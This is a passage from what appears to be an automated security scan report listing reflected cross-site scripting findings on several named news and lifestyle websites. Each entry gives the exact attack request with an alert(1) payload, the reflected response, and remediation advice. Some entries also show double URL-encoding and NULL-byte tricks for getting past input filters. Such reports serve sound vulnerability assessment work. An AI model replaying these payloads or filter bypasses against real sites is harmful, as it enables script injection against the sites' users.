The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d1cb"-alert(1)-"f56ccd415b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hair/?9d1cb"-alert(1)-"f56ccd415b7=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... goryname + " | Main Page";}
s_265.channel="us.style"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,stylelist.com"; s_265.prop12="http://www.stylelist.com/hair/?9d1cb"-alert(1)-"f56ccd415b7=1"; s_265.mmxgo=true; /* if ($bloggerslug!="") { s_265.mmxtitle="Posts at StyleList"; }*/ s_265.t(); } var s_account = "aolstylist,aolsvc"; (function(){ var d = ...[SNIP]...
1.661. http://www.stylelist.com/hair/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.stylelist.com
Path:
/hair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8549d"><script>alert(1)</script>e9794ffa46b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hair/?8549d"><script>alert(1)</script>e9794ffa46b=1 HTTP/1.1 Host: www.stylelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco ...[SNIP]... <link rel="canonical" href="http://www.stylelist.com/hair/?8549d"><script>alert(1)</script>e9794ffa46b=1" /> ...[SNIP]...
1.662. http://www.switched.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.switched.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c7a"><script>alert(1)</script>42f5cefb086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?38c7a"><script>alert(1)</script>42f5cefb086=1 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e594"><script>alert(1)</script>89ac8e16776 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/do-ipad-magazines-take-too-long-to-download/?8e594"><script>alert(1)</script>89ac8e16776=1 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/2011/02/05/do-ipad-magazines-take-too-long-to-download/?8e594"><script>alert(1)</script>89ac8e16776=1"/> ...[SNIP]...
1.664. http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.switched.com
Path:
/2011/02/05/switched-roundup-top-posts-this-week/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a101e"><script>alert(1)</script>45ce8af5842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/switched-roundup-top-posts-this-week/?a101e"><script>alert(1)</script>45ce8af5842=1 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/2011/02/05/switched-roundup-top-posts-this-week/?a101e"><script>alert(1)</script>45ce8af5842=1"/> ...[SNIP]...
1.665. http://www.switched.com/2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b1bd"><script>alert(1)</script>964d69f3398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/the-wii-plays-takes-gameplay-to-the-live-stage/?1b1bd"><script>alert(1)</script>964d69f3398=1 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44cd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef000c89720 was submitted in the REST URL parameter 2. This input was echoed as 44cd3\"><script>alert(1)</script>ef000c89720 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/justtellmewhattoget44cd3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef000c89720 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1f661%253cscript%253ealert%25281%2529%253c%252fscript%253e23e3442d45e was submitted in the REST URL parameter 2. This input was echoed as 1f661<script>alert(1)</script>23e3442d45e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/justtellmewhattoget1f661%253cscript%253ealert%25281%2529%253c%252fscript%253e23e3442d45e HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <h1>Tag: JUSTTELLMEWHATTOGET1F661<SCRIPT>ALERT(1)</SCRIPT>23E3442D45E</h1> ...[SNIP]...
1.668. http://www.switched.com/tag/justtellmewhattoget [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.switched.com
Path:
/tag/justtellmewhattoget
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac663"><script>alert(1)</script>48a60cea5ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/justtellmewhattoget?ac663"><script>alert(1)</script>48a60cea5ac=1 HTTP/1.1 Host: www.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://www.switched.com/tag/justtellmewhattoget?ac663"><script>alert(1)</script>48a60cea5ac=1"/> ...[SNIP]...
1.669. http://www.thatsfit.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thatsfit.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c9c7"><script>alert(1)</script>1dfb1b19086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7c9c7"><script>alert(1)</script>1dfb1b19086=1 HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7126"><a>63735707fa6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/diet-and-weight-losse7126"><a>63735707fa6/ HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.671. http://www.thatsfit.com/category/diet-and-weight-loss/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thatsfit.com
Path:
/category/diet-and-weight-loss/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389e7"><script>alert(1)</script>5ab0792cb9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/diet-and-weight-loss/?389e7"><script>alert(1)</script>5ab0792cb9c=1 HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff947"><a>4c4ae1b0797 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /category/fit-travelff947"><a>4c4ae1b0797/ HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.673. http://www.thatsfit.com/category/fit-travel/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thatsfit.com
Path:
/category/fit-travel/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a79"><script>alert(1)</script>16f61ee58dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/fit-travel/?83a79"><script>alert(1)</script>16f61ee58dc=1 HTTP/1.1 Host: www.thatsfit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.674. http://www.tuaw.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tuaw.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dce8"-alert(1)-"b016f7e52ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1dce8"-alert(1)-"b016f7e52ea=1 HTTP/1.1 Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2127"-alert(1)-"3673c682e5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/?c2127"-alert(1)-"3673c682e5a=1 HTTP/1.1 Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... 65.linkInternalFilters="javascript:,tuaw.com"; s_265.mmxgo = true; s_265.prop1="Tech"; s_265.prop2="Post"; s_265.prop12="http://www.tuaw.com/2011/02/05/in-arlington-tx-try-the-official-super-bowl-app/?c2127"-alert(1)-"3673c682e5a=1"; s_265.prop16="In Arlington, TX? Try the official Super Bowl app"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="mtc"; s_265.prop22="16"; s_265.prop9="bsd:198260 ...[SNIP]...
1.676. http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tuaw.com
Path:
/2011/02/06/app-reviews-stratego-vs-the-general/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ad6"-alert(1)-"fd3328a2c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/app-reviews-stratego-vs-the-general/?c2ad6"-alert(1)-"fd3328a2c19=1 HTTP/1.1 Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... Type=""; s_265.linkInternalFilters="javascript:,tuaw.com"; s_265.mmxgo = true; s_265.prop1="Tech"; s_265.prop2="Post"; s_265.prop12="http://www.tuaw.com/2011/02/06/app-reviews-stratego-vs-the-general/?c2ad6"-alert(1)-"fd3328a2c19=1"; s_265.prop16="App Reviews: Stratego vs. The General"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="mtc"; s_265.prop22="16"; s_265.prop9="bsd:19824550";
var s_ ...[SNIP]...
1.677. http://www.tuaw.com/2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afe7b"-alert(1)-"26e8b01d65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/mobile-version-of-itunes-store-gets-genius-recommendations/?afe7b"-alert(1)-"26e8b01d65a=1 HTTP/1.1 Host: www.tuaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44068%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e640dd7d189d was submitted in the REST URL parameter 2. This input was echoed as 44068</script><script>alert(1)</script>640dd7d189d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/tv-replay44068%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e640dd7d189d HTTP/1.1 Host: www.tvsquad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f779%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5afcbfd66ef was submitted in the REST URL parameter 2. This input was echoed as 8f779\"><script>alert(1)</script>5afcbfd66ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/tv-replay8f779%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5afcbfd66ef HTTP/1.1 Host: www.tvsquad.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f492"><script>alert(1)</script>6df1859dae2 was submitted in the REST URL parameter 1. This input was echoed as 6f492"><script>alert(1)</script>6df1859dae2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%006f492"><script>alert(1)</script>6df1859dae2/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:29 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999995 Connection: Keep-Alive Content-Type: text/html Content-Length: 35506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/%006f492"><script>alert(1)</script>6df1859dae2/02/01/amazon-fights-to-keep-sales-tax-advantage-in-tennessee/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5064"><script>alert(1)</script>ee513e89ec6 was submitted in the REST URL parameter 1. This input was echoed as f5064"><script>alert(1)</script>ee513e89ec6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%00f5064"><script>alert(1)</script>ee513e89ec6/02/03/1040-tax-forms-which-one-should-you-use/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:19 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999941 Connection: Keep-Alive Content-Type: text/html Content-Length: 35473
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%00f5064"><script>alert(1)</script>ee513e89ec6/02/03/1040-tax-forms-which-one-should-you-use/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c4caa"><script>alert(1)</script>4c7756513a2 was submitted in the REST URL parameter 1. This input was echoed as c4caa"><script>alert(1)</script>4c7756513a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%00c4caa"><script>alert(1)</script>4c7756513a2/02/03/government-issues-recall-of-another-lethal-crib/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:22 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999890 Connection: Keep-Alive Content-Type: text/html Content-Length: 35498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%00c4caa"><script>alert(1)</script>4c7756513a2/02/03/government-issues-recall-of-another-lethal-crib/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00eb6a2"><script>alert(1)</script>5a56f96bc82 was submitted in the REST URL parameter 1. This input was echoed as eb6a2"><script>alert(1)</script>5a56f96bc82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /%00eb6a2"><script>alert(1)</script>5a56f96bc82/02/04/a-tax-credit-for-savers-do-you-qualify/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:24 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999877 Connection: Keep-Alive Content-Type: text/html Content-Length: 35459
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/%00eb6a2"><script>alert(1)</script>5a56f96bc82/02/04/a-tax-credit-for-savers-do-you-qualify/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0045940"><script>alert(1)</script>04f62045fc7 was submitted in the REST URL parameter 1. This input was echoed as 45940"><script>alert(1)</script>04f62045fc7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%0045940"><script>alert(1)</script>04f62045fc7/02/04/help-my-tax-documents-are-late/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:23 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999932 Connection: Keep-Alive Content-Type: text/html Content-Length: 35447
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <link rel="canonical" href="http://www.walletpop.com/2011%0045940"><script>alert(1)</script>04f62045fc7/02/04/help-my-tax-documents-are-late/"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005e480"><script>alert(1)</script>f90657b4a2 was submitted in the REST URL parameter 1. This input was echoed as 5e480"><script>alert(1)</script>f90657b4a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /2011%005e480"><script>alert(1)</script>f90657b4a2/02/05/wine-deals-for-valentines-day/ HTTP/1.1 Host: www.walletpop.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 19:52:24 GMT Server: Apache/2.2 Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0 Keep-Alive: timeout=5, max=999984 Connection: Keep-Alive Content-Type: text/html Content-Length: 35439
